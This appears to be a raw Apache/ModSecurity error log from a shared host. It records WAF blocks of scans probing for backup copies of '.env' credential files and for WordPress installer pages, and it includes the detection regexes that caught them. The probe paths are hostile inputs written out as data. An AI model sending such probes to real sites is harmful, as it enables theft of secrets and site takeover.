[Tue May 26 17:11:36.912450 2026] [security2:error] [pid 860158:tid 860301] [client 208.84.100.188:2262] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.swp"] [unique_id "ahWG8IYFlz_JJsUnscKvPQAAAJI"]
[Tue May 26 17:11:36.912665 2026] [security2:error] [pid 860158:tid 860323] [client 208.84.100.188:2326] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production~"] [unique_id "ahWG8IYFlz_JJsUnscKvOQAAAKg"]
[Tue May 26 17:11:36.912959 2026] [proxy:error] [pid 860158:tid 860328] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:36.913047 2026] [proxy_http:error] [pid 860158:tid 860328] [client 208.84.100.188:1898] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:36.913313 2026] [security2:error] [pid 860158:tid 860382] [client 208.84.100.188:2274] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.orig"] [unique_id "ahWG8IYFlz_JJsUnscKvPwAAAOM"]
[Tue May 26 17:11:36.913724 2026] [proxy:error] [pid 860158:tid 860328] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:36.913761 2026] [proxy_http:error] [pid 860158:tid 860328] [client 208.84.100.188:1898] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:36.914154 2026] [proxy:error] [pid 860158:tid 860322] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:36.914216 2026] [proxy_http:error] [pid 860158:tid 860322] [client 208.84.100.188:2314] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:36.914844 2026] [proxy:error] [pid 860158:tid 860322] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:36.914877 2026] [proxy_http:error] [pid 860158:tid 860322] [client 208.84.100.188:2314] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:36.914876 2026] [security2:error] [pid 860158:tid 860332] [client 208.84.100.188:2246] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.backup"] [unique_id "ahWG8IYFlz_JJsUnscKvPgAAALE"]
[Tue May 26 17:11:36.915507 2026] [security2:error] [pid 860158:tid 860368] [client 208.84.100.188:2240] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.old"] [unique_id "ahWG8IYFlz_JJsUnscKvQAAAANU"]
[Tue May 26 17:11:36.915599 2026] [security2:error] [pid 860158:tid 860388] [client 208.84.100.188:2208] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/.env.orig"] [unique_id "ahWG8IYFlz_JJsUnscKvQQAAAOk"]
[Tue May 26 17:11:36.916345 2026] [security2:error] [pid 860158:tid 860391] [client 208.84.100.188:2296] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.bak"] [unique_id "ahWG8IYFlz_JJsUnscKvQwAAAOw"]
[Tue May 26 17:11:36.916684 2026] [security2:error] [pid 860158:tid 860357] [client 208.84.100.188:2290] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.copy"] [unique_id "ahWG8IYFlz_JJsUnscKvRgAAAMo"]
[Tue May 26 17:11:36.916822 2026] [security2:error] [pid 860158:tid 860329] [client 208.84.100.188:2224] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.bak"] [unique_id "ahWG8IYFlz_JJsUnscKvRwAAAK4"]
[Tue May 26 17:11:36.916951 2026] [security2:error] [pid 860158:tid 860415] [client 208.84.100.188:2196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/.env.swp"] [unique_id "ahWG8IYFlz_JJsUnscKvRQAAAQQ"]
[Tue May 26 17:11:36.917224 2026] [proxy:error] [pid 860158:tid 860355] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:36.917272 2026] [proxy_http:error] [pid 860158:tid 860355] [client 208.84.100.188:2250] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:36.917577 2026] [proxy:error] [pid 860158:tid 860305] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:36.917643 2026] [proxy_http:error] [pid 860158:tid 860305] [client 208.84.100.188:2180] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:36.917940 2026] [proxy:error] [pid 860158:tid 860355] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:36.917981 2026] [proxy_http:error] [pid 860158:tid 860355] [client 208.84.100.188:2250] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:36.918514 2026] [proxy:error] [pid 860158:tid 860305] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:36.918563 2026] [proxy_http:error] [pid 860158:tid 860305] [client 208.84.100.188:2180] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:36.919240 2026] [security2:error] [pid 860158:tid 860406] [client 208.84.100.188:2188] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/.env~"] [unique_id "ahWG8IYFlz_JJsUnscKvSQAAAPs"]
[Tue May 26 17:11:36.919301 2026] [security2:error] [pid 860158:tid 860338] [client 208.84.100.188:2214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/.env.copy"] [unique_id "ahWG8IYFlz_JJsUnscKvSgAAALc"]
[Tue May 26 17:11:37.014583 2026] [security2:error] [pid 860158:tid 860413] [client 208.84.100.188:2154] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/.env.bak"] [unique_id "ahWG8YYFlz_JJsUnscKvVAAAAQI"]
[Tue May 26 17:11:37.014590 2026] [security2:error] [pid 860158:tid 860401] [client 208.84.100.188:2162] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/.env.old"] [unique_id "ahWG8YYFlz_JJsUnscKvUgAAAPY"]
[Tue May 26 17:11:37.014764 2026] [proxy:error] [pid 860158:tid 860386] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:37.014829 2026] [proxy_http:error] [pid 860158:tid 860386] [client 208.84.100.188:2144] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:37.015032 2026] [proxy:error] [pid 860158:tid 860294] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:37.015123 2026] [proxy_http:error] [pid 860158:tid 860294] [client 208.84.100.188:2120] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:37.015410 2026] [proxy:error] [pid 860158:tid 860365] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:37.015483 2026] [proxy_http:error] [pid 860158:tid 860365] [client 208.84.100.188:2132] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:37.015575 2026] [proxy:error] [pid 860158:tid 860386] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:37.015637 2026] [proxy_http:error] [pid 860158:tid 860386] [client 208.84.100.188:2144] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:37.015967 2026] [proxy:error] [pid 860158:tid 860294] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:37.016038 2026] [proxy_http:error] [pid 860158:tid 860294] [client 208.84.100.188:2120] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:37.016138 2026] [proxy:error] [pid 860158:tid 860365] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:37.016176 2026] [proxy_http:error] [pid 860158:tid 860365] [client 208.84.100.188:2132] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:37.044910 2026] [security2:error] [pid 860158:tid 860393] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG8IYFlz_JJsUnscKvLQAAAO4"]
[Tue May 26 17:11:37.606094 2026] [security2:error] [pid 860158:tid 860352] [client 208.84.100.188:2178] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/.env.backup"] [unique_id "ahWG8YYFlz_JJsUnscKvbQAAAMU"]
[Tue May 26 17:11:38.064374 2026] [security2:error] [pid 860158:tid 860302] [client 103.174.5.177:59926] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWG8YYFlz_JJsUnscKvXwAAAJM"]
[Tue May 26 17:11:39.013435 2026] [security2:error] [pid 860158:tid 860381] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG8oYFlz_JJsUnscKvigAAAOI"]
[Tue May 26 17:11:39.219905 2026] [proxy:error] [pid 860158:tid 860352] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:39.220017 2026] [proxy_http:error] [pid 860158:tid 860352] [client 208.84.100.188:2214] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:39.220683 2026] [proxy:error] [pid 860158:tid 860352] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:39.220764 2026] [proxy_http:error] [pid 860158:tid 860352] [client 208.84.100.188:2214] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:40.537309 2026] [security2:error] [pid 860158:tid 860332] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG9IYFlz_JJsUnscKvsgAAALE"]
[Tue May 26 17:11:42.764188 2026] [security2:error] [pid 860158:tid 860288] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG9oYFlz_JJsUnscKv5QAAAIU"]
[Tue May 26 17:11:42.817099 2026] [security2:error] [pid 860158:tid 860331] [client 192.126.188.232:51465] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWG9oYFlz_JJsUnscKv2wAAALA"], referer: https://anujtradingco.com
[Tue May 26 17:11:45.557239 2026] [security2:error] [pid 860158:tid 860334] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG-YYFlz_JJsUnscKwNQAAALM"]
[Tue May 26 17:11:46.042218 2026] [security2:error] [pid 860158:tid 860289] [client 54.205.63.235:64089] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "pcc.co.me"] [uri "/wp-admin/setup-config.php"] [unique_id "ahWG-YYFlz_JJsUnscKwVQAAAIY"]
[Tue May 26 17:11:46.062121 2026] [security2:error] [pid 860158:tid 860341] [client 54.205.63.235:49224] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "pcc.co.me"] [uri "/wordpress/wp-admin/setup-config.php"] [unique_id "ahWG-oYFlz_JJsUnscKwVgAAALo"]
[Tue May 26 17:11:46.062304 2026] [security2:error] [pid 860158:tid 860389] [client 54.205.63.235:49225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "pcc.co.me"] [uri "/old/wp-admin/setup-config.php"] [unique_id "ahWG-oYFlz_JJsUnscKwVwAAAOo"]
[Tue May 26 17:11:46.062361 2026] [security2:error] [pid 860158:tid 860412] [client 54.205.63.235:49227] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "pcc.co.me"] [uri "/wordpress1/wp-admin/setup-config.php"] [unique_id "ahWG-oYFlz_JJsUnscKwWQAAAQE"]
[Tue May 26 17:11:46.062728 2026] [security2:error] [pid 860158:tid 860336] [client 54.205.63.235:49228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "pcc.co.me"] [uri "/staging/wp-admin/setup-config.php"] [unique_id "ahWG-oYFlz_JJsUnscKwWgAAALU"]
[Tue May 26 17:11:46.062860 2026] [security2:error] [pid 860158:tid 860363] [client 54.205.63.235:49229] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "pcc.co.me"] [uri "/backup/wp-admin/setup-config.php"] [unique_id "ahWG-oYFlz_JJsUnscKwXAAAANA"]
[Tue May 26 17:11:46.063084 2026] [security2:error] [pid 860158:tid 860311] [client 54.205.63.235:49226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "pcc.co.me"] [uri "/wp/wp-admin/setup-config.php"] [unique_id "ahWG-oYFlz_JJsUnscKwWAAAAJw"]
[Tue May 26 17:11:46.063208 2026] [security2:error] [pid 860158:tid 860361] [client 54.205.63.235:49236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "pcc.co.me"] [uri "/backup/wp-admin/install.php"] [unique_id "ahWG-oYFlz_JJsUnscKwWwAAAM4"]
[Tue May 26 17:11:46.063289 2026] [security2:error] [pid 860158:tid 860392] [client 54.205.63.235:49230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "pcc.co.me"] [uri "/wp-admin/install.php"] [unique_id "ahWG-oYFlz_JJsUnscKwXQAAAO0"]
[Tue May 26 17:11:46.063643 2026] [security2:error] [pid 860158:tid 860339] [client 54.205.63.235:49234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "pcc.co.me"] [uri "/wordpress1/wp-admin/install.php"] [unique_id "ahWG-oYFlz_JJsUnscKwYAAAALg"]
[Tue May 26 17:11:46.063706 2026] [security2:error] [pid 860158:tid 860352] [client 54.205.63.235:49235] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "pcc.co.me"] [uri "/wp/wp-admin/install.php"] [unique_id "ahWG-oYFlz_JJsUnscKwYQAAAMU"]
[Tue May 26 17:11:46.063821 2026] [security2:error] [pid 860158:tid 860293] [client 54.205.63.235:49237] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "pcc.co.me"] [uri "/demo/wp-admin/install.php"] [unique_id "ahWG-oYFlz_JJsUnscKwYgAAAIo"]
[Tue May 26 17:11:46.063881 2026] [security2:error] [pid 860158:tid 860290] [client 54.205.63.235:49233] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "pcc.co.me"] [uri "/staging/wp-admin/install.php"] [unique_id "ahWG-oYFlz_JJsUnscKwXwAAAIc"]
[Tue May 26 17:11:46.063999 2026] [security2:error] [pid 860158:tid 860374] [client 54.205.63.235:49232] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "pcc.co.me"] [uri "/old/wp-admin/install.php"] [unique_id "ahWG-oYFlz_JJsUnscKwXgAAANs"]
[Tue May 26 17:11:46.064692 2026] [security2:error] [pid 860158:tid 860381] [client 54.205.63.235:49231] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "pcc.co.me"] [uri "/wordpress/wp-admin/install.php"] [unique_id "ahWG-oYFlz_JJsUnscKwYwAAAOI"]
[Tue May 26 17:11:46.237232 2026] [security2:error] [pid 860158:tid 860354] [client 54.205.63.235:49377] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "pcc.co.me"] [uri "/test/wp-admin/install.php"] [unique_id "ahWG-oYFlz_JJsUnscKwZwAAAMc"]
[Tue May 26 17:11:47.182358 2026] [security2:error] [pid 860158:tid 860364] [client 203.194.101.7:62412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWG-4YFlz_JJsUnscKwhAAAANE"]
[Tue May 26 17:11:47.182500 2026] [security2:error] [pid 860158:tid 860364] [client 203.194.101.7:62412] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWG-4YFlz_JJsUnscKwhAAAANE"]
[Tue May 26 17:11:47.492938 2026] [security2:error] [pid 860158:tid 860338] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG-4YFlz_JJsUnscKwgwAAALc"]
[Tue May 26 17:11:48.838889 2026] [security2:error] [pid 860158:tid 860354] [client 83.229.26.101:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG_IYFlz_JJsUnscKwpQAAAMc"]
[Tue May 26 17:11:50.136103 2026] [security2:error] [pid 860158:tid 860382] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG_YYFlz_JJsUnscKwywAAAOM"]
[Tue May 26 17:11:51.733581 2026] [security2:error] [pid 860158:tid 860322] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG_4YFlz_JJsUnscKw_gAAAKc"]
[Tue May 26 17:11:53.689830 2026] [security2:error] [pid 860158:tid 860400] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHAYYFlz_JJsUnscKxPQAAAPU"]
[Tue May 26 17:11:53.806530 2026] [security2:error] [pid 860158:tid 860199] [remote 74.7.241.58:54706] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWHAYYFlz_JJsUnscKxUAAArCg"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
